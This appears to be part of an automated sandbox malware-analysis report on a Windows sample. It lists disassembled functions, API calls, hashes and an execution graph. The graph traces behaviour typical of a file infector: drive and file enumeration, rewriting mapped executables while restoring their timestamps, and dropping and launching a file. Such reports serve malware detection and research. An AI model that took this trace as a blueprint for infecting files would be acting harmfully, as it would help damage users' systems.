                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
                                • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
                                • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: __decode_pointer$__initterm$__lock_doexit
                              • String ID:
                              • API String ID: 1597249276-0
                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00404454
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404469
                              • UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404474
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00404490
                              • TerminateProcess.KERNEL32(00000000), ref: 00404497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
                              • Instruction ID: a2c1d01f0a8fc7b860fa4c5ba8dee9755c81e3f17099ada6bc54c17834eb60e6
                              • Opcode Fuzzy Hash: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
                              • Instruction Fuzzy Hash: 3E21FEB4401210EFD740DF65FA856893BB4FB48300F1184BAEA08E76B0E3F859A48F1D
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00005FBE), ref: 00406005
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
                              • Instruction ID: 276ab158461ab0854dff8c4ba172e82da5abdd5be2fa13cd776f410961e88b47
                              • Opcode Fuzzy Hash: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
                              • Instruction Fuzzy Hash: 7890026125252196D60027715E0968776D49A5960676109716212E4094DABC8054991A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
                              • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 735 4010a0-4010ca 736 4010cc 735->736 737 4010df-401107 call 401e96 735->737 738 4010d0-4010d3 736->738 743 4011b1-4011cb call 401a9b call 401b60 737->743 744 40110d-401112 737->744 740 4010d5 738->740 741 4010d9-4010dd 738->741 740->741 741->737 741->738 754 4011ce-4011e6 call 401ee2 743->754 744->743 745 401118-40113f call 401e96 744->745 751 401142-401147 745->751 751->751 753 401149-401154 751->753 755 401160-401166 753->755 756 401156-40115a 753->756 758 401171-4011af call 401c84 call 401a9b call 401b60 755->758 761 401168-40116f 755->761 756->758 759 40115c 756->759 758->754 759->755 761->755 761->758
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: __wsplitpath_calloc_strncpy$__wmakepath
                              • String ID: \$\
                              • API String ID: 550690-164819647
                              • Opcode ID: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
                              • Instruction ID: ff4e68a8fe18fc9b97d4bba43c3c323c9ca1ce8c53413bd27601e723a30b8d8d
                              • Opcode Fuzzy Hash: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
                              • Instruction Fuzzy Hash: 9F316CB1404380AED325DB10CC81FEBB3E8AF89704F04496EF7C567191E378994887AB
                              APIs
                              • _memset.LIBCMT ref: 00401375
                              • SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
                              • _fprintf.LIBCMT ref: 004013C7
                              • WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
                              • GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
                              • String ID: D$failed to create process.$failed to get exit code from process.
                              • API String ID: 1493708761-2047806753
                              • Opcode ID: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
                              • Instruction ID: 34a530c21fcf4aab6bb134418fb42986268233c3b95e978881f8daa222adcb36
                              • Opcode Fuzzy Hash: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
                              • Instruction Fuzzy Hash: D31191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A
                              APIs
                              • __getptd.LIBCMT ref: 004046D1
                                • Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
                                • Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E
                              • __amsg_exit.LIBCMT ref: 004046F1
                              • __lock.LIBCMT ref: 00404701
                              • InterlockedDecrement.KERNEL32(?), ref: 0040471E
                              • InterlockedIncrement.KERNEL32(00941688), ref: 00404749
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
                              • Instruction ID: 762af939121588747dd0ca135b41566db6ae5fc7b386992e2f1cba590a1bc26f
                              • Opcode Fuzzy Hash: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
                              • Instruction Fuzzy Hash: EE01EDB1901621ABC720AF2698067AE7664BB41755F04813BEA60772D0CB3C6D01CFDD
                              APIs
                              • __lock.LIBCMT ref: 00403ADB
                                • Part of subcall function 00403EF9: __mtinitlocknum.LIBCMT ref: 00403F0F
                                • Part of subcall function 00403EF9: __amsg_exit.LIBCMT ref: 00403F1B
                                • Part of subcall function 00403EF9: EnterCriticalSection.KERNEL32(?,?,?,004019E7,?), ref: 00403F23
                              • ___sbh_find_block.LIBCMT ref: 00403AE6
                              • ___sbh_free_block.LIBCMT ref: 00403AF5
                              • HeapFree.KERNEL32(00000000,?,0040F578,0000000C,0040515F,00000000,?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C), ref: 00403B25
                              • GetLastError.KERNEL32(?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C,00403F14,?,?,?,004019E7,?), ref: 00403B36
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                              • String ID:
                              • API String ID: 2714421763-0
                              • Opcode ID: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
                              • Instruction ID: 0fc8657c13906ab74fcdd902c6ebe0ed0f7107b6a60225d746b313d4028bb8d5
                              • Opcode Fuzzy Hash: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
                              • Instruction Fuzzy Hash: 64015EB1941305AADA306FA2980AB5B7E689B0072AF10853FF104B61C2CA7C9A408A5C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: _sprintf$_calloc
                              • String ID: %s
                              • API String ID: 1847391153-3874713491
                              • Opcode ID: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
                              • Instruction ID: 3e0aaedb16861467738b36e15ffebac14c8137eedcf37fbcf32618918a6528ec
                              • Opcode Fuzzy Hash: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
                              • Instruction Fuzzy Hash: B72138312042025FC311CF1CC494EE6B3E69F86348F15456AF885EB2B2DA76E90E87D5
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A318
                              • __isleadbyte_l.LIBCMT ref: 0040A34C
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A37D
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A3EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
                              • Instruction ID: ecb9902cf17e40a010e2e2b1b54a430317f3bb45ddcf6aa4964fa5cd43223a8d
                              • Opcode Fuzzy Hash: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
                              • Instruction Fuzzy Hash: C531D031A00346EFDB20DF64C8949AE3BA5FF01310B1589BAE861AB2D1D734DD60DB5A
                              APIs
                              • __getptd.LIBCMT ref: 00404E3D
                                • Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
                                • Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E
                              • __getptd.LIBCMT ref: 00404E54
                              • __amsg_exit.LIBCMT ref: 00404E62
                              • __lock.LIBCMT ref: 00404E72
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID:
                              • API String ID: 3521780317-0
                              • Opcode ID: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
                              • Instruction ID: 09d2f9d651c6c409bc02885c121a8a6903a39f7021fc6d6957eb733fdf563978
                              • Opcode Fuzzy Hash: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
                              • Instruction Fuzzy Hash: ADF062B69407008AD630BB75D80674F76907F40725F15823FF6407B2D2CB7C5901CA99

                              Execution Graph

                              Execution Coverage:32.2%
                              Dynamic/Decrypted Code Coverage:10.7%
                              Signature Coverage:18.8%
                              Total number of Nodes:298
                              Total number of Limit Nodes:11
                              execution_graph 1013 8f615d 1014 8f6164 VirtualFree 1013->1014 1017 8f60c7 1014->1017 1015 8f6198 VirtualFree 1019 8f61b2 1015->1019 1016 8f60d5 VirtualAlloc 1016->1017 1017->1015 1017->1016 1021 8f615f VirtualFree 1017->1021 1018 8f6389 VirtualProtect 1024 8f63b7 1018->1024 1019->1018 1025 8f62fb 1019->1025 1020 8f63fc VirtualProtect 1022 8f6400 1020->1022 1021->1017 1023 8f63e7 VirtualProtect 1023->1020 1023->1024 1024->1020 1024->1023 1026 8f6076 1027 8f607b 1026->1027 1031 8f60c7 1026->1031 1029 8f60b0 VirtualAlloc 1027->1029 1027->1031 1038 8f61b2 1027->1038 1028 8f615f VirtualFree 1028->1031 1029->1031 1030 8f6198 VirtualFree 1030->1038 1031->1028 1031->1030 1032 8f60d5 VirtualAlloc 1031->1032 1032->1031 1033 8f6389 VirtualProtect 1036 8f63b7 1033->1036 1034 8f63fc VirtualProtect 1035 8f6400 1034->1035 1036->1034 1037 8f63e7 VirtualProtect 1036->1037 1037->1034 1037->1036 1038->1033 1039 8f62fb 1038->1039 1343 8f6014 1344 8f6035 GetModuleHandleA 1343->1344 1345 8f605f 1343->1345 1346 8f604d GetProcAddress 1344->1346 1347 8f6058 1346->1347 1347->1345 1347->1346 1347->1347 1040 8f14e1 1041 8f14fd GetModuleHandleA 1040->1041 1042 8f1541 1040->1042 1043 8f151a VirtualQuery 1041->1043 1044 8f1512 1041->1044 1045 8f1573 1042->1045 1047 8f1549 1042->1047 1043->1044 1044->1042 1051 8f1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1045->1051 1048 8f1566 1047->1048 1068 8f1af9 1047->1068 1049 8f1579 ExitProcess 1052 8f167f 1051->1052 1053 8f167a 1051->1053 1074 8f1718 GetSystemTimeAsFileTime 1052->1074 1086 8f139f GetVersionExA 1053->1086 1056 8f1686 1057 8f16ca 1056->1057 1063 8f16a0 CreateThread 1056->1063 1058 8f16d7 1057->1058 1059 8f16d0 1057->1059 1061 8f170f 1058->1061 1062 8f16dd lstrcpy 1058->1062 1107 8f1581 1059->1107 1061->1049 1062->1049 1079 8f2c48 memset 1063->1079 1323 8f1099 1063->1323 1067 8f1718 3 API calls 1067->1057 1069 8f1b09 1068->1069 1070 8f1b11 1068->1070 1071 8f1638 188 API calls 1069->1071 1072 8f1b16 CreateThread 1070->1072 1073 8f1b0f 1070->1073 1071->1073 1072->1073 1342 8f1638 189 API calls 1072->1342 1073->1048 1073->1073 1075 8f1735 SHSetValueA 1074->1075 1076 8f1754 1074->1076 1078 8f1786 __aulldiv 1075->1078 1077 8f175a SHGetValueA 1076->1077 1076->1078 1077->1078 1078->1056 1113 8f1973 PathFileExistsA 1079->1113 1081 8f2cb2 1084 8f2cbb VirtualFree 1081->1084 1085 8f16ba WaitForSingleObject 1081->1085 1082 8f2c8f CreateThread WaitForMultipleObjects 1082->1081 1135 8f2b8c memset GetLogicalDriveStringsA 1082->1135 1084->1085 1085->1067 1087 8f13cf LookupPrivilegeValueA 1086->1087 1088 8f14da 1086->1088 1089 8f13e7 1087->1089 1090 8f13ef 1087->1090 1088->1052 1303 8f119f GetCurrentProcess OpenProcessToken 1089->1303 1090->1088 1308 8f120e GetModuleHandleA GetProcAddress 1090->1308 1096 8f1448 GetCurrentProcessId 1096->1088 1097 8f1457 1096->1097 1097->1088 1098 8f1319 3 API calls 1097->1098 1099 8f147f 1098->1099 1100 8f1319 3 API calls 1099->1100 1101 8f148e 1100->1101 1101->1088 1102 8f1319 3 API calls 1101->1102 1103 8f14b4 1102->1103 1104 8f1319 3 API calls 1103->1104 1105 8f14c3 1104->1105 1106 8f1319 3 API calls 1105->1106 1106->1088 1322 8f185b GetSystemTimeAsFileTime srand rand srand rand 1107->1322 1109 8f1592 wsprintfA wsprintfA lstrlen CreateFileA 1110 8f15fb WriteFile CloseHandle 1109->1110 1111 8f1633 1109->1111 1110->1111 1112 8f161d ShellExecuteA 1110->1112 1111->1061 1112->1111 1114 8f1ac7 1113->1114 1115 8f19a0 1113->1115 1114->1081 1114->1082 1116 8f19af CreateFileA 1115->1116 1117 8f1a28 GetFileSize 1116->1117 1118 8f19c4 Sleep 1116->1118 1119 8f1a38 1117->1119 1120 8f1a80 1117->1120 1118->1116 1121 8f19d5 1118->1121 1119->1120 1122 8f1a3d VirtualAlloc 1119->1122 1123 8f1a8d CloseHandle 1120->1123 1124 8f1a96 1120->1124 1134 8f185b GetSystemTimeAsFileTime srand rand srand rand 1121->1134 1122->1120 1132 8f1a53 1122->1132 1123->1124 1126 8f1aad 1124->1126 1131 8f1a9c DeleteFileA 1124->1131 1126->1114 1133 8f1ab8 VirtualFree 1126->1133 1127 8f19da wsprintfA CopyFileA 1127->1117 1130 8f1a0d CreateFileA 1127->1130 1128 8f1a59 ReadFile 1128->1120 1128->1132 1130->1117 1130->1131 1131->1126 1132->1120 1132->1128 1133->1114 1134->1127 1136 8f2c09 WaitForMultipleObjects 1135->1136 1137 8f2bc8 1135->1137 1139 8f2c3c 1136->1139 1140 8f2c2a CreateThread 1136->1140 1138 8f2bfa lstrlen 1137->1138 1141 8f2bd2 GetDriveTypeA 1137->1141 1142 8f2be3 CreateThread 1137->1142 1138->1136 1138->1137 1140->1139 1146 8f2845 1140->1146 1141->1137 1141->1138 1142->1138 1143 8f2b7d 1142->1143 1156 8f29e2 memset wsprintfA 1143->1156 1293 8f274a memset memset SHGetSpecialFolderPathA wsprintfA 1146->1293 1148 8f2878 DeleteFileA 1149 8f288c VirtualFree 1148->1149 1150 8f289a 1148->1150 1149->1150 1152 8f28ab 1150->1152 1153 8f28a4 CloseHandle 1150->1153 1151 8f2692 8 API calls 1154 8f2853 1151->1154 1153->1152 1154->1148 1154->1151 1155 8f239d 186 API calls 1154->1155 1155->1154 1157 8f2abc memset memset FindFirstFileA 1156->1157 1158 8f2a3a memset lstrlen lstrcpyn strrchr 1156->1158 1170 8f28b8 memset wsprintfA 1157->1170 1158->1157 1159 8f2a88 1158->1159 1159->1157 1161 8f2a9a lstrcmpiA 1159->1161 1163 8f2aad lstrlen 1161->1163 1164 8f2b74 1161->1164 1163->1157 1163->1161 1165 8f2b61 FindNextFileA 1166 8f2b6d FindClose 1165->1166 1167 8f2b23 1165->1167 1166->1164 1168 8f2b35 lstrcmpiA 1167->1168 1169 8f28b8 174 API calls 1167->1169 1168->1166 1168->1167 1169->1165 1171 8f2951 memset 1170->1171 1172 8f2905 1170->1172 1171->1165 1172->1171 1173 8f291b memset wsprintfA 1172->1173 1174 8f2956 strrchr 1172->1174 1175 8f29e2 180 API calls 1173->1175 1174->1171 1176 8f2967 lstrcmpiA 1174->1176 1175->1171 1177 8f297a 1176->1177 1178 8f2988 lstrcmpiA 1176->1178 1188 8f1e6e 1177->1188 1178->1171 1180 8f2994 1178->1180 1181 8f29ad strstr 1180->1181 1184 8f29a5 lstrcpy 1180->1184 1182 8f29cb 1181->1182 1183 8f29d3 1181->1183 1231 8f239d strstr 1182->1231 1253 8f2692 1183->1253 1184->1181 1189 8f1e7d 1188->1189 1262 8f1df6 strrchr 1189->1262 1192 8f2332 1195 8f233d UnmapViewOfFile 1192->1195 1196 8f2346 1192->1196 1193 8f1eb0 SetFileAttributesA CreateFileA 1193->1192 1194 8f1edf 1193->1194 1267 8f1915 1194->1267 1195->1196 1199 8f234b CloseHandle 1196->1199 1200 8f2350 1196->1200 1199->1200 1201 8f2356 CloseHandle 1200->1201 1202 8f2391 1200->1202 1201->1202 1202->1171 1203 8f1f2e 1203->1192 1273 8f1c81 1203->1273 1207 8f1f92 1208 8f1c81 2 API calls 1207->1208 1209 8f1f9f 1208->1209 1209->1192 1210 8f1af9 169 API calls 1209->1210 1211 8f2024 1209->1211 1214 8f1fc0 1210->1214 1211->1192 1212 8f1af9 169 API calls 1211->1212 1213 8f207a 1212->1213 1215 8f1af9 169 API calls 1213->1215 1214->1192 1214->1211 1216 8f1af9 169 API calls 1214->1216 1219 8f2090 1215->1219 1217 8f1ffe 1216->1217 1218 8f2013 FlushViewOfFile 1217->1218 1218->1211 1220 8f20bb memset memset 1219->1220 1221 8f20f5 1220->1221 1222 8f1c81 2 API calls 1221->1222 1224 8f21de 1222->1224 1223 8f2226 memcpy UnmapViewOfFile CloseHandle 1278 8f1b8a 1223->1278 1224->1223 1226 8f226e 1286 8f185b GetSystemTimeAsFileTime srand rand srand rand 1226->1286 1228 8f22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1229 8f1915 3 API calls 1228->1229 1230 8f231f CloseHandle 1229->1230 1230->1192 1232 8f2451 CreateFileA GetFileSize 1231->1232 1239 8f23d8 1231->1239 1233 8f2675 CloseHandle 1232->1233 1234 8f2480 1232->1234 1235 8f267c RemoveDirectoryA 1233->1235 1234->1233 1236 8f2499 1234->1236 1237 8f2687 1235->1237 1238 8f1915 3 API calls 1236->1238 1237->1171 1240 8f24a4 9 API calls 1238->1240 1239->1232 1239->1237 1288 8f189d memset CreateProcessA 1240->1288 1243 8f255c Sleep memset wsprintfA 1244 8f29e2 163 API calls 1243->1244 1245 8f2597 memset wsprintfA Sleep 1244->1245 1246 8f189d 6 API calls 1245->1246 1247 8f25e4 Sleep CreateFileA 1246->1247 1248 8f1915 3 API calls 1247->1248 1249 8f2610 CloseHandle 1248->1249 1249->1235 1250 8f261e 1249->1250 1250->1235 1251 8f2641 SetFilePointer WriteFile 1250->1251 1251->1235 1252 8f2667 SetEndOfFile 1251->1252 1252->1235 1254 8f26b2 WaitForSingleObject 1253->1254 1255 8f26a2 CreateEventA 1253->1255 1256 8f2708 1254->1256 1257 8f26c1 lstrlen ??2@YAPAXI 1254->1257 1255->1254 1258 8f2736 SetEvent 1256->1258 1261 8f2718 lstrcpy ??3@YAXPAX 1256->1261 1257->1258 1259 8f26da lstrcpy 1257->1259 1258->1171 1260 8f26f1 1259->1260 1260->1258 1261->1260 1263 8f1e13 lstrcpy strrchr 1262->1263 1264 8f1e62 1262->1264 1263->1264 1265 8f1e40 lstrcmpiA 1263->1265 1264->1192 1264->1193 1265->1264 1266 8f1e52 lstrlen 1265->1266 1266->1264 1266->1265 1268 8f1928 1267->1268 1271 8f1924 SetFilePointer CreateFileMappingA MapViewOfFile 1267->1271 1269 8f194f 1268->1269 1270 8f192e memset GetFileTime 1268->1270 1269->1271 1272 8f1954 SetFileTime 1269->1272 